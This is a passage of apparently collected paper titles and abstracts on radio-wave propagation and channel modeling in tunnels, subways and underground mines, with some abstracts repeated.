By subtracting the measured received power in the curved tunnels from the simulated reference power, the extra loss resulting from the tunnel curve is extracted. Finally, this paper presents the figures and tables quantitatively reflecting the correlations between the extra loss and radius of curvature, frequency, polarization, and cross section, respectively. The results are valuable for statistical modeling and the involvement of the extra loss in the design and network planning of communication systems in subway tunnels. --- paper_title: Wideband analysis of large scale and small scale fading in tunnels paper_content: In this contribution, the analysis and the modeling of the large scale and small scale fading statistics in a semicircular tunnel is presented. The results are based on experimental data obtained during an extensive measurement campaign in the 2.8 - 5 GHz frequency range. Lastly, a simple model to characterize the statistics of the received signal in tunnels is presented. --- paper_title: An Empirical Random-Cluster Model for Subway Channels Based on Passive Measurements in UMTS paper_content: Recently, a measurement campaign for characterizing the channels in underground subway environments was conducted in Shanghai, China. Downlink signals transmitted by 46 universal mobile telecommunication system cells deployed along a 34-km-long subway were collected. Channel impulse responses are extracted from the data received in the common pilot channels, based on which parameters of multipath components are estimated by using a high-resolution parameter algorithm derived using the space-alternating generalized expectation-maximization principle. Multiple time-evolving clusters are obtained, each representing the channel from a remote-radio-unit of a base station to the receiver. Based on a total of 98 time-evolving clusters, channels observed in the station scenario and the tunnel scenario are modeled separately for their distinctive behaviors in many aspects, particularly in the variations of clusters’ trajectories. Intracluster characteristics parameterized by cluster delay and Doppler frequency spreads, $K$ -factor, and dependences among these parameters are investigated. Intercluster parameters, including coexisting cluster number, delay offset, power offset, and cross correlations, are investigated for the station scenario. A path loss model is established for the tunnel scenario. --- paper_title: Effect of Antenna Position and Polarization on UWB Propagation Channel in Underground Mines and Tunnels paper_content: Radio propagation in confined spaces is consequent upon reflections by the boundaries. In such cases, the relative position and polarization of antennas becomes important. This paper investigates the effect of antenna position and polarization on ultra-wideband radio propagation in underground mines and tunnels. Analysis is based on channel measurements, over 2.4 to 4 GHz frequency band, in three tunnels of varying cross-sectional dimensions and lengths. Effects of mounting antennas on ceiling versus walls and horizontal versus vertical polarization are compared in terms of path loss and time dispersion. Results show that average path loss is more sensitive to antenna position and polarization, than is time dispersion. The effect of polarization is found to be dependent upon antenna position. 
Horizontal polarization results in less average path loss when the antennas are mounted close to the ceiling, whereas vertical polarization results in less average loss when mounted close to a side wall. It is demonstrated that carefully considering antenna position and polarization can result in more efficient and cost-effective deployment of UWB systems in underground environments. --- paper_title: Path loss modeling and fading analysis for channels with various antenna setups in tunnels at 30 GHz band paper_content: The high-speed railway (HSR) environment has unique characteristics in radio propagation. The research on radio channel in HSR plays a vital role in system design, especially for advanced mobile systems working in the millimetre-wave band. This paper presents the simulation in a typical straight and arched tunnel at 30 GHz band with a verified ray-tracing tool. The simulation results illustrate that the advanced mobile communication system with high gain directional antennas can support longer than 1 km communication links in the tunnel. In this paper, the channel characteristics of three different antenna setups are compared at frequencies ranging from 31.5 GHz∼33.5 GHz, e.g., path loss exponent, autocorrelation and decorrelation distance of shadow fading, etc. Additionally, these characteristics will be shown with statistic values that can easily reproduce the radio channel properties. Furthermore, the results will be utilized to guide further realistic measurement campaign and physical layer design for advanced mobile communication systems. --- paper_title: Measurements of the propagation of UHF radio waves on an underground railway train paper_content: Measurements of the natural propagation of UHF radio waves on an underground train are reported. Of prime interest are the natural propagation attenuation and the median signal level behavior. The propagation attenuation rates or the median signal level behaviors are found to correlate with the train carriages and frequency. On the front carriage, the propagation attenuation rate is 54 dB/100 m at 465 MHz and reduced to 21 dB/100 m at 820 MHz. However, on the rear carriage, it becomes 14.8 dB/100 m at 465 MHz and 7.8 dB/100 m at 820 MHz. It is shown that higher frequency is beneficial to the natural propagation and the train body greatly affects the natural propagation. Furthermore, the values of the path loss exponent are also given. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. 
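The measurement papers above repeatedly report the same set of large- and small-scale statistics: a path loss exponent, a shadow-fading standard deviation, the level crossing rate (LCR) and the average fade duration (AFD). As a hedged illustration of how such figures can be extracted from a raw received-power trace, the following Python sketch assumes only that distance samples, path-loss samples and a small-scale fading envelope are available; the log-distance model and all function names are illustrative and are not taken from any of the cited papers.

```python
import numpy as np

def fit_log_distance_path_loss(d_m, pl_db, d0=1.0):
    """Least-squares fit of PL(d) = PL(d0) + 10*n*log10(d/d0) + X_sigma.
    Returns the intercept PL(d0), the path loss exponent n and the
    shadow-fading standard deviation sigma (dB) of the residuals."""
    pl = np.asarray(pl_db, dtype=float)
    x = 10.0 * np.log10(np.asarray(d_m, dtype=float) / d0)
    A = np.column_stack([np.ones_like(x), x])
    (pl_d0, n), *_ = np.linalg.lstsq(A, pl, rcond=None)
    sigma = np.std(pl - (pl_d0 + n * x))
    return pl_d0, n, sigma

def lcr_afd(envelope_db, threshold_db, sample_interval_s):
    """Level crossing rate (fades per second) and average fade duration of a
    small-scale fading envelope sampled at a fixed interval."""
    below = np.asarray(envelope_db) < threshold_db
    fades = np.count_nonzero(np.diff(below.astype(int)) == 1)  # entries into fade
    lcr = fades / (below.size * sample_interval_s)
    afd = np.count_nonzero(below) * sample_interval_s / fades if fades else float("inf")
    return lcr, afd
```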
--- paper_title: On the Possibility of Interpreting Field Variations and Polarization in Arched Tunnels Using a Model for Propagation in Rectangular or Circular Tunnels paper_content: We investigate the possibility of using the modal theory of the electromagnetic propagation in rectangular or circular tunnels, to satisfactorily interpret experimental results, including polarization, in arched tunnels. This study is based on extensive measurement campaigns carried out in the 450 MHz-5 GHz frequency range. --- paper_title: Analysis of radio wave propagation characteristics in rectangular road tunnel at 800 MHz and 2.4 GHz paper_content: We analyze radio wave propagation characteristics in tunnel using simulations by ray-tracing method and measurements for a newly constructed tunnel in Korea. As the simulation results using direct wave and 25 reflected waves and the measurement ones against the 14.7 meters wide, and 6.15 meters high, and 365 meters long tunnel is similar to each other, the radio wave propagation model for predicting received power in the tunnel can be applied to the other tunnels. --- paper_title: Enhancement of rectangular tunnel waveguide model paper_content: The ray theory is applied to locate the break point to distinguish propagation regions for line-of-sight topographies in rectangular tunnels. It is found that path loss in tunnels differs greatly in the regions prior to and after the break point. Nevertheless at least two waveguide modes are needed to accurately model tunnel natural propagation. In addition, the errors in the formulas to calculate the losses due to roughness and tilt of the tunnel walls are corrected. As a result, the propagation loss prediction of the rectangular tunnel waveguide model is significantly enhanced. --- paper_title: Research of propagation characteristics of break point: near zone and far zone under operational subway condition paper_content: This paper focuses on three vital aspects in propagation characteristics inside tunnels: break point; near zone and far zone in a practical environment. Firstly, all the distinguishing features of radio channel in the areas before and after break point at different angles such as modal theory, ray-tracing theory, statistics and propagation model have been summarized. By collectively analyzing the research perspectives above, a panoramic view on the propagation characteristics of break point; far zone and near zone has been proposed. Based on a measurement carried out in Madrid operational subway environment at 2.4 GHz, some new radio channel characters of the break point; the regions before and after break point at higher frequency have been discussed and analyzed. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. 
Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Broadband Channel Long Delay Cluster Measurements and Analysis at 2.4GHz in Subway Tunnels paper_content: The delay caused by the reflected ray in broadband communication has a great influence on the communications in subway tunnel. This paper presents measurements taken in subway tunnels at 2.4 GHz, with 5 MHz bandwidth. According to propagation characteristics of tunnel, the measurements were carried out with a frequency domain channel sounding technique, in three typical scenarios: line of sight (LOS), Non-line-of-sight (NLOS) and far line of sight (FLOS), which lead to different delay distributions. Firstly IFFT was chosen to get channel impulse response (CIR) h(t) from measured three-dimensional transfer functions. Power delay profile (PDP) was investigated to give an overview of broadband channel model. Thereafter, a long delay caused by the obturation of tunnel is observed and investigated in all the scenarios. The measurements show that the reflection can be greatly remained by the tunnel, which leads to long delay cluster where the reflection, but direct ray, makes the main contribution for radio wave propagation. Four important parameters: distribution of whole PDP power, first peak arriving time, reflection cluster duration and PDP power distribution of reflection cluster were studied to give a detailed description of long delay characteristic in tunnel. This can be used to ensure high capacity communication in tunnels. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Modeling and measurement of wireless channels for underground mines paper_content: This paper investigates wireless channel modeling for underground mines. The ray tracing and modal methods, which have been widely used for modeling radio propagation in tunnels, are applied to model wireless channels in underground mines. In addition, propagation measurements are taken in an underground hard rock mine at three different frequencies (455 MHz, 915 MHz, and 2.45 GHz). Simulation results based on the ray tracing and modal methods are compared to measurement results and show agreement. Challenges for modeling wireless channels in mines are discussed. 
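Several entries above treat the tunnel as an oversized lossy waveguide and compare modal predictions with measurements. As a rough illustration of that viewpoint, the sketch below evaluates a commonly quoted first-order approximation for the attenuation of the dominant (1,1) mode in a rectangular tunnel, in the spirit of the coal-mine waveguide theory cited later in this list; the exact constants and validity conditions should be checked against the original derivations before use.

```python
import math

def mode11_attenuation_db_per_m(freq_hz, width_m, height_m, eps_r, polarization="horizontal"):
    """First-order attenuation (dB/m) of the dominant (1,1) mode in a lossy
    rectangular tunnel.  Only meaningful well above the tunnel cut-off
    frequency; constants are an approximation, not a cited result."""
    lam = 3.0e8 / freq_hz
    root = math.sqrt(eps_r - 1.0)
    if polarization == "horizontal":
        loss = eps_r / (width_m ** 3 * root) + 1.0 / (height_m ** 3 * root)
    else:  # vertical polarization: the permittivity term attaches to the height
        loss = 1.0 / (width_m ** 3 * root) + eps_r / (height_m ** 3 * root)
    return 4.343 * lam ** 2 * loss

# Example (illustrative values): a 4 m x 3 m tunnel with wall eps_r = 5 at 915 MHz
# gives on the order of a few dB per 100 m, falling quickly with frequency.
# mode11_attenuation_db_per_m(915e6, 4.0, 3.0, 5.0)
```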
--- paper_title: Theoretical and experimental approach of the propagation of high frequency waves in road tunnels paper_content: Characterization of high frequency electromagnetic wave propagation in tunnels has important applications in the field of mobile communication. In long tunnels, the amplitude of the electric field radiated by a retransmitting antenna can be easily calculated from ray theory. However, for short tunnels, one of the most critical points is either the radiation towards free space of a mobile station emitting in the tunnel or, on the contrary, the penetration of an external wave inside the tunnel. This coupling between the inside and the outside is treated through the uniform theory of diffraction. By comparing theoretical and experimental results, it is shown that this theory leads to adequate prediction of the field variation and allows the authors to point out the influence of parameters, such as the position of the mobile in the tunnel and the influence of the angle of incidence, on the entrance plane of an incoming external wave. > --- paper_title: A ray-tracing method for predicting delay spread in tunnel environments paper_content: Our model to predict the propagation is based on ray-tracing which uses an images algorithm to find paths between transmitter and receiver of a digital communication system. It accounts for all rays reaching the receiver location after an arbitrary number of reflections and includes the effect of the angle of incidence, the material dielectric constant, the antenna pattern and polarization, the wall roughness, and the tunnel cross section size. The simulation results in this paper are obtained by analyzing many fewer rays compared to other published results. The results illustrate that in an empty straight rectangular tunnel environment, propagation has a very short time delay spread. Meanwhile, the results have shown that rms delay spread for horizontally polarized transmit and receive antennas is more than for vertically polarized transmit and receive antennas, in which the attenuation constant is less when transmit and receive antennas are horizontally polarized than when they are vertically polarized. Finally, by using a specific pattern, the rms delay spread is decreased compared to an isotropic antenna. --- paper_title: Experimental Characterization of an UWB Propagation Channel in Underground Mines paper_content: An experimental characterization of the ultrawideband (UWB) propagation channel in an underground mine environment over the frequency range from 3 GHz to 10 GHz is reported in this paper. Two kinds of antennas, directional and omnidirectional, were used to investigate the effect of the antenna directivity on the path loss propagation and on the time dispersion parameters in both line-of-sight (LOS) and no-line-of-sight (NLOS) underground galleries. The measurement and simulation results show that the path loss exponents in an underground environment are larger than their counterparts in an indoor environment. In NLOS, the directional-directional (Direct-Direct) antenna combination showed better radiation efficiency for reducing the time dispersion parameters while the omnidirectional-omni directional (Omni-Omni) case resulted better performance in term of path loss. After extracting the channel parameters, a statistical modeling of the UWB underground channel based on data measurements was conducted. 
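The time-dispersion parameters quoted above (mean excess delay, RMS delay spread) follow directly from a power delay profile using the standard moment definitions. A minimal sketch, not specific to any cited paper:

```python
import numpy as np

def delay_spread(delays_s, powers_lin):
    """Mean excess delay and RMS delay spread of a power delay profile.
    `delays_s` are the path delays in seconds, `powers_lin` the linear
    (not dB) path powers."""
    tau = np.asarray(delays_s, dtype=float)
    p = np.asarray(powers_lin, dtype=float)
    p = p / p.sum()                                       # normalize the profile
    mean_delay = np.sum(p * tau)                          # first moment
    rms = np.sqrt(np.sum(p * (tau - mean_delay) ** 2))    # second central moment
    return mean_delay, rms

# Example: a three-path profile with delays of 0, 50 and 120 ns
# delay_spread([0.0, 50e-9, 120e-9], [1.0, 0.5, 0.1])
```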
--- paper_title: Effect of antenna on propagation characteristics of electromagnetic waves in tunnel environments paper_content: The optimal radiation pattern and optimal position of the source antenna installed inside a tunnel is the concern of this paper. By comparing theoretical and experimental results, it is shown that the field distribution of the electromagnetic wave in tunnel environments is sensitive to the position of the transmitting antenna in the cross section of a tunnel. And compared with the Omni-directional antenna, the utilization of the vertical antenna with radiation pattern of sinn θ on the upper middle of the wall, or the horizontal antenna with radiation pattern of sinn ϕ on the middle of the side wall, could represent significant improvement of the standing wave graphics, as well as the propagation attenuation. --- paper_title: Influence of Dimension Change on Radio Wave Propagation in Rectangular Tunnels paper_content: Based on the propagation modal and the software simulation method, characteristics of radio wave propagation in rectangular tunnels are studied from the view of the size shift of the tunnel width and height. The results show that the influence of the height change on the vertical polarization mode is greater than on the horizontal polarization mode; that of the width change on the vertical polarization mode is less than on the horizontal polarization mode. --- paper_title: Propagation in tunnels: experimental investigations and channel modeling in a wide frequency band for MIMO applications paper_content: The analysis of the electromagnetic field statistics in an arched tunnel is presented. The investigation is based on experimental data obtained during extensive measurement campaigns in a frequency band extending from 2.8GHz up to 5GHz and for a range varying between 50m and 500 m. Simple channel models that can be used for simulating MIMO links are also proposed. --- paper_title: Subway tunnel guided electromagnetic wave propagation at mobile communications frequencies paper_content: A measurement campaign has been carried out in the Berlin subway to characterize electromagnetic wave propagation in underground railroad tunnels. The received power levels at 945 and 1853.4 MHz are used to evaluate the attenuation and the fading characteristics in a curved arched-shaped tunnel. The measurements are compared to ray-optical modeling results, which are based on ray density normalization. It is shown that the geometry of a tunnel, especially the cross-sectional shape and the course, is of major impact on the propagation behavior and thus on the accuracy of the modeling, while the material parameters of the building materials have less impact. --- paper_title: Channel modeling and analysis for wireless networks in underground mines and road tunnels paper_content: Wireless networks can greatly facilitate the communication in underground mines and road/subway tunnels, where the propagation characteristics of electromagnetic (EM) waves are significantly different from those in terrestrial environments. According to the structure of underground mines and road tunnels, two types of channel models can be utilized, namely, tunnel and room/pillar channel models. However, there exists no theoretical model for room-and-pillar channel in underground mines to date, and current existing tunnel channel models do not provide an analytical solution for both near and far regions of the sources. 
In this paper, the multimode model is proposed, which provides an analytical expression for the received power and the power delay profile at any position in a tunnel. Moreover, the multimode model is extended to characterize the room-and-pillar channel in underground mines after combining it with the shadow fading model. The theoretical models are validated by experimental measurements. Based on the proposed channel models, the effects of various factors on the signal propagation are analyzed. The factors include: the operating frequency, the size of the tunnel or underground mine room, the antenna position and polarization, and the electrical parameters. --- paper_title: Propagation Character of Electromagnetic Wave of the Different Transmitter Position in Mine Tunnel paper_content: In order to analyze the propagation characteristics of electromagnetic waves in the confined space of a mine tunnel when the wireless sensor is placed at different positions, the electric-field intensity and magnetic-field intensity of the horizontally polarized wave are obtained according to Maxwell's equations and the boundary conditions of the tunnel. The electric-field attenuation coefficients of horizontally and vertically polarized waves are deduced through the traveling-wave condition of the confined space. The attenuation characteristics for different transmitter positions in rectangular mine tunnels are simulated in an experimental tunnel. The results show that the electric-field intensity attenuates quickly within the first 50 m. When the transmitter is closer to the tunnel wall, the propagation modes are more complex and the attenuation is more severe, whereas in the middle of the tunnel the attenuation rate is lowest. This is useful for evaluating the wireless sensor network channel in mine tunnels. --- paper_title: Influence of Mine Tunnel Wall Humidity on Electromagnetic Waves Propagation paper_content: High moisture in a mine tunnel can change the permittivity and conductivity of the tunnel walls and therefore influence the characteristics of electromagnetic wave propagation. This paper analyzes the mechanism by which humidity influences the permittivity, conductivity, and attenuation of electromagnetic wave propagation in circular and rectangular tunnels. The results show that, in the frequency range of interest, the permittivity change caused by humidity has little effect on propagation attenuation, but the effect of the conductivity change cannot be ignored. When the humidity is greater than a certain value, the attenuation will be increased significantly. --- paper_title: Analysis of radio wave propagation characteristics in rectangular road tunnel at 800 MHz and 2.4 GHz paper_content: We analyze radio wave propagation characteristics in a tunnel using ray-tracing simulations and measurements for a newly constructed tunnel in Korea. Since the simulation results using the direct wave and 25 reflected waves agree well with the measurements in the 14.7 m wide, 6.15 m high, and 365 m long tunnel, the radio wave propagation model for predicting received power in the tunnel can be applied to other tunnels.
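The rectangular-tunnel ray-tracing studies above sum a direct ray and a limited number of wall-reflected rays found with the image method. The following deliberately simplified 2-D sketch illustrates only the image bookkeeping between two parallel side walls, with a constant reflection coefficient and isotropic antennas; it is not a reproduction of any cited model.

```python
import numpy as np

def image_method_gain_db(d_axial, x_tx, x_rx, width, freq_hz, refl=-0.7, max_order=5):
    """Coherent sum of the direct ray and side-wall reflected rays between two
    parallel walls at x = 0 and x = width (2-D horizontal cut of a rectangular
    tunnel).  Returns the path gain in dB relative to isotropic antennas."""
    lam = 3.0e8 / freq_hz
    k = 2.0 * np.pi / lam
    total = 0j
    for n in range(-max_order, max_order + 1):
        # images of the transmitter and the number of wall bounces for each
        for x_img, bounces in ((2 * n * width + x_tx, abs(2 * n)),
                               (2 * n * width - x_tx, abs(2 * n - 1))):
            r = np.hypot(d_axial, x_rx - x_img)
            total += (refl ** bounces) * np.exp(-1j * k * r) / r
    # normalized so that the direct ray alone reproduces the free-space gain
    return 20.0 * np.log10(np.abs(total) * lam / (4.0 * np.pi))
```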
--- paper_title: Radio Wave Attenuation Character in the Confined Environments of Rectangular Mine Tunnel paper_content: Radio wave propagation is more complex in confined environments such as coal mine tunnels. In order to obtain the propagation characteristics of radio waves in such confined environments, the electric-field intensity and magnetic-field intensity of the horizontally polarized wave are obtained according to Maxwell's equations and the boundary conditions of the tunnel. The attenuation coefficients of the electric field for horizontal and vertical polarization are deduced through the traveling-wave condition of the confined space. The attenuation characteristics for different transmitter positions in rectangular mine tunnels are simulated in an experimental tunnel. The results show that the electric-field intensity attenuates quickly within the first 50 m. When the transmitter is closer to the tunnel wall, the propagation modes are more complex and the attenuation is more severe, whereas in the middle of the tunnel the attenuation rate is lowest. Factors that influence the attenuation characteristics of radio waves in mine tunnels are also analyzed and simulated, which is useful for evaluating the wireless channel quality in mine tunnels. --- paper_title: A Novel Wideband MIMO Car-to-Car Channel Model Based on a Geometrical Semi-Circular Tunnel Scattering Model paper_content: In this paper, we present a wideband multiple-input multiple-output (MIMO) car-to-car (C2C) channel model based on a geometrical semi-circular tunnel (SCT) scattering model. From the geometrical SCT scattering model, a reference channel model is derived under the assumption of single-bounce scattering in line-of-sight (LOS) and non-LOS (NLOS) propagation environments. In the proposed reference channel model, it is assumed that an infinite number of scatterers are randomly distributed on the tunnel wall. Starting from the geometrical scattering model, the time-variant transfer function (TVTF) is derived, and its correlation properties in time, frequency, and space are studied. Expressions are presented for the space–time–frequency cross-correlation function (STF-CCF), the two-dimensional (2D) space CCF, the 2D time–frequency CCF (TF-CCF), the temporal autocorrelation function (ACF), and the frequency correlation function (FCF). Owing to the semi-circular geometry, we reduced the originally threefold integrals to double integrals in the computations of the correlation functions, which simplifies the numerical analysis considerably. From the TVTF characterizing the reference model, an efficient sum-of-cisoid (SOC) channel simulator is derived. Numerical results show that both the temporal ACF and the FCF of the SOC channel simulator match very well with those of the reference model. A validation of the proposed model has been done by fitting the delay spread of the reference model to that of the measured channel, which demonstrates an excellent agreement. The proposed channel simulator allows us to evaluate the performance of C2C communication systems in tunnel environments. --- paper_title: Channel modeling of wireless communication in underground coal mines paper_content: Communication systems relying on wireless technology can significantly improve the safety and production in underground mines; however, their unreliable operation in such high-stress environments is a significant obstacle to achieving this.
Underground mine tunnels offer several distinctive features that are quite different from regular rail/road tunnels. While several studies have been performed on electromagnetic (EM) wave propagation in tunnel environments, there is limited understanding of the inter-working of tunnel dimensions with long-range tilt variations (a typical feature of coal mines) on the propagation characteristics of wireless radio waves. In this paper, we present and describe a new hybrid multimode model for wireless communication in underground coal mines and analyze it with respect to important parameters such as operating frequency, mine tunnel size, and transmitter-receiver position. The characterization results suggest that the mine tunnel size and transmitter-receiver position affect the signal behavior significantly. --- paper_title: Modeling for MIMO wireless channels in mine tunnels paper_content: Electromagnetic wave propagation is very complex in mine tunnels, so it is important to establish an efficient MIMO channel model for applying wireless communication technology underground in coal mines. A stochastic MIMO channel model is first proposed based on the wireless propagation environment in mine tunnels, and then two spatially correlated channel models are established by correcting the channel matrices for a rich-scattering environment. In this paper, the singular values and the channel capacity obtained with a Rayleigh channel model are compared, and the system performance of the different channel models is simulated. The simulation results, compared with measurement results in mine tunnels, indicate that the established channel models are feasible. --- paper_title: Ray-optical modeling of simulcast radio propagation channels in tunnels paper_content: Simulcast radio propagation channel characteristics inside tunnels are considered in this paper. Based on the image theory of ray optics, a simulcast radio propagation channel in a rectangular tunnel is exactly formulated. As only the field components of horizontal and vertical polarization are of interest in real implementation, the exact formulation is approximated to facilitate the numerical computation. The calculated simulcast radio propagation channels compare fairly well with measurements at 900 MHz and 2.0 GHz. The validated ray-optical modeling approach is then applied to simulate simulcast radio propagation channel characteristics at 900 MHz and 2.0 GHz to gain deeper insight and better understanding of this type of channel in tunnels. Results show that large fluctuations occur in the capture regions of the distributed antennas for both 900 MHz and 2.0 GHz. The fluctuations in the simulcast regions are larger at 2.0 GHz than at 900 MHz. The root-mean-squared (rms) delay spread is greater in the simulcast regions than in the capture regions of the distributed antennas. This larger delay spread is mainly due to the delay introduced by the transmission medium. Large values of the rms delay spread can be avoided by a careful design of the distance between the distributed antennas. --- paper_title: Tunnel and Non-Tunnel Channel Characterization for High-Speed-Train Scenarios in LTE-A Networks paper_content: In this contribution, a measurement campaign for the high-speed-train (HST) channel is introduced, in which the downlink signals of an in-service Long Term Evolution-Advanced (LTE-A) network deployed along the HST railway between Beijing and Shanghai are acquired.
Channel impulse responses (CIRs) are extracted from the received signals, and concatenated power delay profiles (CPDPs) are illustrated. According to the delay trajectories of the CPDPs, measurement scenarios are categorized into non-tunnel and tunnel scenarios. The delay spread and K-factor are investigated for both scenarios. The results show that the two scenarios have distinguishable statistics in delay spread and K-factor. --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes a geometric distribution of scatterers that is totally different from that on the ground, puts forward a new GBSB model of the MIMO channel, and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: In-Tunnel Vehicular Radio Channel Characterization paper_content: Inside a tunnel, electromagnetic wave propagation differs strongly from the well understood "open-air" situation. The characterization of the tunnel environment is crucial for deploying vehicular communication systems. In this paper we evaluate vehicle-to-vehicle (V2V) radio channel measurements inside a tunnel. We estimate the time-varying root mean square (rms) delay and Doppler spreads, as well as the excess delay and the maximum Doppler dispersion. The fading process in V2V communications is inherently non-stationary. Hence, we characterize the stationarity time, for which we can consider the fading process to be wide sense stationary. We show that the spreads, excess delay, and maximum Doppler dispersion are larger on average when both vehicles are inside the tunnel compared to the "open-air" situation. The temporal evolution of the stationarity time is highly influenced by the strength of time-varying multipath components and the distance between vehicles. Furthermore, we show the good fit of the rms delay and Doppler spreads to a lognormal distribution, as well as for the stationarity time. From our analysis we can conclude that the IEEE 802.11p standard will be robust towards inter-symbol and inter-carrier interference inside a tunnel. --- paper_title: Measurements and Modeling of Distributed Antenna Systems in Railway Tunnels paper_content: This paper covers some of the work carried out in the planning of the Global System for Mobile Communications for Railway (GSM-R) in the tunnels of the new high-speed lines in Spain. Solutions based on distributed antenna systems have been tested by installing several 900-MHz transmitters inside and outside of a 4000-m tunnel and measuring the propagation in different conditions. The measurements have been used to model the effects of tunnel propagation, including curves, trains passing from the outside to the inside, and the effect of two trains passing inside the tunnel. All cases have been tested by comparing solutions using isofrequency and multifrequency distributed transmitters inside the tunnel. The improvements of signal-to-noise ratio and the reduction of the blocking effects of two trains passing have demonstrated the advantages of using isofrequency distributed antenna systems in tunnels.
The model has proven to be very useful for radio planning in new railway networks. --- paper_title: Investigation on MIMO channels in subway tunnels paper_content: The purpose of this paper is to examine the possibilities of increasing the channel capacity in tunnels, and particularly in railway tunnels, due to the use of multiple-input-multiple-output techniques. Many measurement campaigns have been carried out, considering the complicated geometric structure of these tunnels. We determine the channel characteristics by making a statistical analysis of correlation matrices between antennas and singular values of the channel transfer matrix. A comparison between the theoretical and experimental results is also presented. A stochastic channel model is then proposed and validated. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Modeling and Understanding MIMO propagation in Tunnels paper_content: This paper first presents an application of the modal theory for interpreting experimental results of the electromagnetic field variation along a tunnel. The transmitting frequency is assumed to be high enough so that the tunnel behaves as an oversized waveguide. Then, for a Multiple-Input Multiple-Output channel, theoretical results of the channel capacity are given. To explain the decrease of the capacity at large distance from the transmitter, even by assuming a constant signal to noise ratio, an approach based on the calculation of the eigenvalues of the transfer matrix in a reference scenario is described. --- paper_title: A Novel Wideband MIMO Car-to-Car Channel Model Based on a Geometrical Semi-Circular Tunnel Scattering Model paper_content: In this paper, we present a wideband multiple-input multiple-output (MIMO) car-to-car (C2C) channel model based on a geometrical semi-circular tunnel (SCT) scattering model. From the geometrical SCT scattering model, a reference channel model is derived under the assumption of single-bounce scattering in line-of-sight (LOS) and non-LOS (NLOS) propagation environments. In the proposed reference channel model, it is assumed that an infinite number of scatterers are randomly distributed on the tunnel wall. Starting from the geometrical scattering model, the time-variant transfer function (TVTF) is derived, and its correlation properties in time, frequency, and space are studied. 
Expressions are presented for the space–time–frequency cross-correlation function (STF-CCF), the two-dimensional (2D) space CCF, the 2D time–frequency CCF (TF-CCF), the temporal autocorrelation function (ACF), and the frequency correlation function (FCF). Owing to the semi-circular geometry, we reduced the originally threefold integrals to double integrals in the computations of the correlation functions, which simplifies the numerical analysis considerably. From the TVTF characterizing the reference model, an efficient sum-of-cisoid (SOC) channel simulator is derived. Numerical results show that both the temporal ACF and the FCF of the SOC channel simulator match very well with those of the reference model. A validation of the proposed model has been done by fitting the delay spread of the reference model to that of the measured channel, which demonstrates an excellent agreement. The proposed channel simulator allows us to evaluate the performance of C2C communication systems in tunnel environments. --- paper_title: Characterization of Angular Spread in Underground Tunnels Based on the Multimode Waveguide Model paper_content: One of the biggest challenges facing wireless designers is determining how to configure multiple-input–multiple-output (MIMO) antennas in underground-environments, such as mines, so that they deliver best performance. Here, we showed that angular dispersion of the signal, a phenomenon that greatly impacts channel capacity, can be accurately predicted in both near-field and far-field of underground tunnels using a multimode waveguide. Not only this analytical model is much faster than other methods, but also it does not have other shortcomings of measurement-based modeling (e.g., poor resolution for far distances in the tunnel). Further, we characterized angular-spread for different tunnel sizes and showed that the power-azimuth-spectrum can be modeled by a zero-mean Gaussian distribution whose standard-deviation (angular-spread) is dependent on the tunnel dimension and the transmitter-receiver distance. Angular-spread is found to be a decreasing function of axial distance. After a certain distance, it becomes very small (about 4 $^{\circ}$ ) and independent of tunnel transverse dimension. Our results are useful for design of MIMO systems in underground tunnels and sufficient to permit the correlation-matrix required to extend the IEEE 802.11n MIMO channel model to underground environments. --- paper_title: A calculation model and characteristics analysis of radio wave propagation in rectangular shed tunnel paper_content: Shed tunnel belongs to a kind of heterogeneous tunnel of open cut tunnel, which has been widely used in the railway as well as highway construction. Geometrical optics method is adopted in this paper to study and present a simulation of radio waves propagation in rectangular shed tunnels. By comparing the received power under different polarization modes, frequencies and permittivities, we get some relevant 